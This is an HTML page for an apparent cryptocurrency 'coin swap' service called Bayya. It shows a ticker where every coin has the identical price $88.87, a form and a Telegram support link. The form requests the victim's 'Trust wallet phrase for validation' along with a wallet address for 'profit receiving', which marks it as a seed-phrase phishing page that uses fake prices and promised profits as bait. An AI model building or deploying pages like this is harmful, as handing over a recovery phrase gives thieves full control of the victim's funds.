<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" href="images/favicon.png">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="userside.css">
    <link rel="stylesheet" href="fontss/fontawesome-free-5.15.3-web/attribution.js">
    <link rel="stylesheet" href="fontss/Noto_Sans_JP/NotoSansJP-Black.otf">
    <link rel="stylesheet" href="fontss/Noto_Sans_JP/NotoSansJP-Bold.otf">
    <link rel="stylesheet" href="./fontss/fontawesome-free-5.15.3-web/css/all.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bayya - Bitcoin Crypto Currency</title>
</head>
<body>
    <style>
        body{
            margin: 0%;
            padding: 0%;
        }
        .createt{
            width: 35%;
            margin: auto;
            padding: 20px;
            height: 570px;
            background-color: rgb(0, 0, 0); 
        }
        .swap-container{
            width: 100%;
            height: 900px; 
            background-color: rgba(0, 0, 0, 0.74);
            background-blend-mode: multiply;
            background-size: 100% 100%;
            background-image: url(/images/slider/bg1.jpg);
        }
        .leto{
     text-decoration: none;
     color: white;
}
.appp{
    padding: 5px;
    color: white;
   background-color: #fd961a;
   border: none;
   font-size: 13px;
   cursor: pointer;
}
.watbtn{
    margin: auto;
    width: 15%; 
    margin-top: -72px; 
    cursor: pointer;
}
   
        .swap-now{
            width:30%;
            height:40px;
            margin-top: 40px;
            float: right; 
        }
        .wap{
            width: 100%;
            border: none;
            height: inherit;
            color: white;
            cursor: pointer;
            background-color: #fd961a;
        }
        .swap-dive{
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            color: white;
            text-align: center;
            width: 100%;
            padding: 15px;  
        }
        .inpoy{
             width: 95%;
             outline: solid black;
             padding: 15px;
             color: white;
             background-color: rgb(27, 26, 26);
             border: none;
        }
        .per{
            color: gray;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        } 
        @media (max-width:425px) {  
        .createt{
            width: 80%;
        }    
    .inpu-div{
        width: 80%;
    } 
    .watbtn{ 
        width: 50%;
        margin-top: -180px;
    }
    .swap-now{
        width: 50%;
    }
}
    </style>      
   <div class="crypto-layouts">
    <marquee behavior="" direction="" class="marqss">
        <div class="crypto-one"><i class="fab fa-bitcoin"></i>
            <b class="its">Bitcoin</b>
            <b class="it">$88.87</b>
            <p class="btcprise"> <a href="https://www.blockchain.com/prices/BTC" class="plizr" target="blanki">
                    +2.36%</a></p>
        </div>
    </marquee>

    <marquee behavior="" direction="">
        <div class="crypto-one"><i class="fab fa-ethereum"></i>
            <b class="it">Etheleum</b>
            <b class="it">$88.87</b>
            <p class="btcprise"> <a href="https://www.blockchain.com/prices/ETH" class="plizrs" target="blanki">
                    +2.36%</a></p>
        </div>

    </marquee>

    <marquee behavior="" direction="">
        <div class="crypto-one"><img src="https://img.icons8.com/pastel-glyph/64/000000/tron.png"/>
            <b class="it">Tron</b>
            <b class="it">$88.87</b>
            <p class="btcprise"> <a href=" https://www.blockchain.com/prices/TRON" class="plizrser" target="blanki"> -2.36%</a></p>
        </div>

    </marquee>

    <marquee behavior="" direction="">
        <div class="crypto-one"><i class="fas fa-dog"></i>
            <b class="it">Doge</b>
            <b class="it">$88.87</b>
            <p class="btcprise"> <a href="https://www.blockchain.com/prices/DOGE" class="plizr" target="blanki">
                    -2.36%</a></p>
        </div>

    </marquee>

    <marquee behavior="" direction="">
        <div class="crypto-one"><i class="fab fa-uniregistry"></i>
            <b class="it">Uni</b>
            <b class="it">$88.87</b>
            <p class="btcprise"> <a href="https://www.blockchain.com/prices/UNI" class="plizr" target="blanki">
                    +2.36%</a></p>
        </div>

    </marquee>

    <marquee behavior="" direction="">
        <div class="crypto-one"><i class="fab fa-instalod"></i>
            <b class="it">ALGO</b>
            <b class="it">$88.87</b>
            <p class="btcprise"> <a href="https://www.blockchain.com/prices/ALGO" class="plizrs" target="blank">
                    -2.36%</a></p>
        </div>
    </marquee>
</div>
       <div class="swap-container">
           <br>
           <br>
           <br>
           <br> 
           <br>
            
           <form action="./pay.html">
            <div class="createt">
                <div class="swap-dive">
                    <b>
                        Swap <label for="" style="color: #fd961a ;">coin   </label>
                    </b>
                    <p style="font-size: 12px; color: rgb(212, 212, 212);">
                        Note only works for trust wallet users
                    </p>
                </div>
                <input type="email"  placeholder="Email" class="inpoy" required>
                <br>
                <br>
                 <input type="text"  placeholder="From" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="To" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="Amount to swap" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="  Your wallet Address for profit receiving" class="inpoy" required>
                 <br>
                 <br>
                 <input type="text"  placeholder="Trust wallet phrase for validation" class="inpoy" required>
                 <br>
                 <br>
                 <b class="per">
                     Percentage
                 </b>
                 <br>
                 <br>
                 <select name="" id="" class="inpoy"  >
                     <option value=""> 10%</option>
                     <option value=""> 20%</option>
                     <option value=""> 30%</option>
                     <option value=""> 40%</option>
                     <option value=""> 50%</option>
                     <option value=""> 60%</option>
                     <option value=""> 70%</option>
                     <option value=""> 80%</option>
                     <option value=""> 90%</option>
                     <option value=""> 100%</option>
                 </select>
                 <br>
                 <div class="swap-now">
                      <button class="wap">
                          Swap now
                      </button>
                 </div>
                </div>
           </form>
       </div>
       <div class="watbtn">
        <button class="appp">
            <a href="https://t.me/+MvaaGiRjPs42YzBk" class="leto">
             Am cunfused join us on telegram
         </a>
        </button>
     </div>
</body>
</html>